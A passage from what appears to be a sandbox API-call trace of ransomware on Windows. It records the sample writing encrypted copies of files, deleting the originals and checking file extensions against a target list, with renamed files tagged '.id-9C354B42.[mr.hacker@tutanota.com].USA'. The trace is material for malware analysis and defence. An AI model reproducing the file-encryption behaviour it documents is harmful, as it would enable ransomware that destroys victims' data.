nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xcc0, lpOverlapped=0x0) returned 1 [0264.060] WriteFile (in: hFile=0x348, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xcd0, lpOverlapped=0x0) returned 1 [0264.061] ReadFile (in: hFile=0x344, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0264.061] WriteFile (in: hFile=0x348, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xea, lpOverlapped=0x0) returned 1 [0264.061] SetEndOfFile (hFile=0x348) returned 1 [0264.061] CloseHandle (hObject=0x348) returned 1 [0264.061] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0264.062] SetEndOfFile (hFile=0x344) returned 1 [0264.062] CloseHandle (hObject=0x344) returned 1 [0264.062] SetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x80) returned 1 [0264.063] DeleteFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 1 [0264.063] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.063] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.063] lstrlenW (lpString=".doc") returned 4 [0264.063] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0264.063] lstrlenW (lpString=".docx") returned 5 [0264.063] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0264.063] lstrlenW (lpString=".pdf") returned 4 [0264.063] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0264.063] lstrlenW (lpString=".xls") returned 4 [0264.063] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0264.063] lstrlenW (lpString=".xlsx") returned 5 [0264.063] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0264.063] lstrlenW (lpString=".ppt") returned 4 [0264.063] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0264.063] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.063] lstrlenW (lpString=".zip") returned 4 [0264.063] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0264.063] lstrlenW (lpString=".rar") returned 4 [0264.063] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0264.063] lstrlenW (lpString=".bz2") returned 4 [0264.063] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0264.063] lstrlenW (lpString=".7z") returned 3 [0264.063] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0264.064] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.064] lstrlenW (lpString=".dbf") returned 4 [0264.064] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.064] lstrlenW (lpString=".1cd") returned 4 [0264.064] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0264.064] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.064] lstrlenW (lpString=".jpg") returned 4 [0264.064] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.064] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.064] lstrlenW (lpString=".doc") returned 4 [0264.064] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString=".docx") returned 5 [0264.064] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0264.064] lstrlenW (lpString=".pdf") returned 4 [0264.064] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString=".xls") returned 4 [0264.064] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString=".xlsx") returned 5 [0264.064] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0264.064] lstrlenW (lpString=".ppt") returned 4 [0264.064] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.064] lstrlenW (lpString=".zip") returned 4 [0264.064] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString=".rar") returned 4 [0264.064] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0264.064] lstrlenW (lpString=".bz2") returned 4 [0264.065] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0264.065] lstrlenW (lpString=".7z") returned 3 [0264.065] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0264.065] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.065] lstrlenW (lpString=".dbf") returned 4 [0264.065] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0264.065] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.065] lstrlenW (lpString=".1cd") returned 4 [0264.065] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0264.065] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0264.065] lstrlenW (lpString=".jpg") returned 4 [0264.065] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0264.065] Sleep (dwMilliseconds=0x64) [0264.161] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0264.161] lstrlenW (lpString="Alphabet.xml") returned 12 [0264.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0264.161] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=791686) returned 1 [0264.161] CloseHandle (hObject=0x350) returned 1 [0264.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0264.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.162] lstrlenW (lpString=".doc") returned 4 [0264.162] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.162] lstrlenW (lpString=".docx") returned 5 [0264.162] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0264.162] lstrlenW (lpString=".pdf") returned 4 [0264.162] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.162] lstrlenW (lpString=".xls") returned 4 [0264.162] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.162] lstrlenW (lpString=".xlsx") returned 5 [0264.162] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0264.162] lstrlenW (lpString=".ppt") returned 4 [0264.162] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.162] lstrlenW (lpString=".zip") returned 4 [0264.162] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.162] lstrlenW (lpString=".rar") returned 4 [0264.162] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.162] lstrlenW (lpString=".bz2") returned 4 [0264.162] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.162] lstrlenW (lpString=".7z") returned 3 [0264.162] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.162] lstrlenW (lpString=".dbf") returned 4 [0264.162] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.163] lstrlenW (lpString=".1cd") returned 4 [0264.163] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.163] lstrlenW (lpString=".jpg") returned 4 [0264.163] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.163] lstrlenW (lpString=".doc") returned 4 [0264.163] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString=".docx") returned 5 [0264.163] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0264.163] lstrlenW (lpString=".pdf") returned 4 [0264.163] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString=".xls") returned 4 [0264.163] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString=".xlsx") returned 5 [0264.163] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0264.163] lstrlenW (lpString=".ppt") returned 4 [0264.163] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.163] lstrlenW (lpString=".zip") returned 4 [0264.163] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.163] lstrlenW (lpString=".rar") returned 4 [0264.163] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString=".bz2") returned 4 [0264.163] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString=".7z") returned 3 [0264.163] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.163] lstrlenW (lpString=".dbf") returned 4 [0264.163] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.164] lstrlenW (lpString=".1cd") returned 4 [0264.164] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0264.164] lstrlenW (lpString=".jpg") returned 4 [0264.164] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.164] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0264.164] lstrlenW (lpString="Content.xml") returned 11 [0264.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0264.164] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=27045) returned 1 [0264.164] CloseHandle (hObject=0x350) returned 1 [0264.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0264.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.164] lstrlenW (lpString=".doc") returned 4 [0264.164] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.164] lstrlenW (lpString=".docx") returned 5 [0264.164] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0264.164] lstrlenW (lpString=".pdf") returned 4 [0264.164] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString=".xls") returned 4 [0264.165] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString=".xlsx") returned 5 [0264.165] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0264.165] lstrlenW (lpString=".ppt") returned 4 [0264.165] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.165] lstrlenW (lpString=".zip") returned 4 [0264.165] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.165] lstrlenW (lpString=".rar") returned 4 [0264.165] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString=".bz2") returned 4 [0264.165] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString=".7z") returned 3 [0264.165] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.165] lstrlenW (lpString=".dbf") returned 4 [0264.165] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.165] lstrlenW (lpString=".1cd") returned 4 [0264.165] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.165] lstrlenW (lpString=".jpg") returned 4 [0264.165] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.165] lstrlenW (lpString=".doc") returned 4 [0264.165] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.165] lstrlenW (lpString=".docx") returned 5 [0264.166] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0264.166] lstrlenW (lpString=".pdf") returned 4 [0264.166] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.166] lstrlenW (lpString=".xls") returned 4 [0264.166] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.166] lstrlenW (lpString=".xlsx") returned 5 [0264.166] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0264.166] lstrlenW (lpString=".ppt") returned 4 [0264.166] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.166] lstrlenW (lpString=".zip") returned 4 [0264.166] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.166] lstrlenW (lpString=".rar") returned 4 [0264.166] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.166] lstrlenW (lpString=".bz2") returned 4 [0264.166] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.166] lstrlenW (lpString=".7z") returned 3 [0264.166] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.166] lstrlenW (lpString=".dbf") returned 4 [0264.166] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.166] lstrlenW (lpString=".1cd") returned 4 [0264.166] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0264.166] lstrlenW (lpString=".jpg") returned 4 [0264.166] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.166] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0264.167] lstrlenW (lpString="boxed-correct.avi") returned 17 [0264.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0264.168] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=89600) returned 1 [0264.168] CloseHandle (hObject=0x358) returned 1 [0264.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0264.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.169] lstrlenW (lpString=".doc") returned 4 [0264.169] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString=".docx") returned 5 [0264.169] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0264.169] lstrlenW (lpString=".pdf") returned 4 [0264.169] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString=".xls") returned 4 [0264.169] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString=".xlsx") returned 5 [0264.169] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0264.169] lstrlenW (lpString=".ppt") returned 4 [0264.169] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.169] lstrlenW (lpString=".zip") returned 4 [0264.169] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString=".rar") returned 4 [0264.169] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString=".bz2") returned 4 [0264.169] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString=".7z") returned 3 [0264.169] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.169] lstrlenW (lpString=".dbf") returned 4 [0264.169] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.169] lstrlenW (lpString=".1cd") returned 4 [0264.170] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.170] lstrlenW (lpString=".jpg") returned 4 [0264.170] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.170] lstrlenW (lpString=".doc") returned 4 [0264.170] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString=".docx") returned 5 [0264.170] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0264.170] lstrlenW (lpString=".pdf") returned 4 [0264.170] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString=".xls") returned 4 [0264.170] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString=".xlsx") returned 5 [0264.170] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0264.170] lstrlenW (lpString=".ppt") returned 4 [0264.170] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.170] lstrlenW (lpString=".zip") returned 4 [0264.170] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString=".rar") returned 4 [0264.170] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString=".bz2") returned 4 [0264.170] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.170] lstrlenW (lpString=".7z") returned 3 [0264.170] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.170] lstrlenW (lpString=".dbf") returned 4 [0264.170] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.171] lstrlenW (lpString=".1cd") returned 4 [0264.171] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0264.171] lstrlenW (lpString=".jpg") returned 4 [0264.171] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.171] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0264.171] lstrlenW (lpString="boxed-delete.avi") returned 16 [0264.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0264.175] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=31744) returned 1 [0264.175] CloseHandle (hObject=0x350) returned 1 [0264.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0264.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.176] lstrlenW (lpString=".doc") returned 4 [0264.176] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.176] lstrlenW (lpString=".docx") returned 5 [0264.176] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0264.176] lstrlenW (lpString=".pdf") returned 4 [0264.176] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.176] lstrlenW (lpString=".xls") returned 4 [0264.176] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.176] lstrlenW (lpString=".xlsx") returned 5 [0264.176] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0264.176] lstrlenW (lpString=".ppt") returned 4 [0264.176] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.176] lstrlenW (lpString=".zip") returned 4 [0264.176] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.176] lstrlenW (lpString=".rar") returned 4 [0264.176] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.176] lstrlenW (lpString=".bz2") returned 4 [0264.176] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.176] lstrlenW (lpString=".7z") returned 3 [0264.176] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.176] lstrlenW (lpString=".dbf") returned 4 [0264.176] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.177] lstrlenW (lpString=".1cd") returned 4 [0264.177] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.177] lstrlenW (lpString=".jpg") returned 4 [0264.177] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 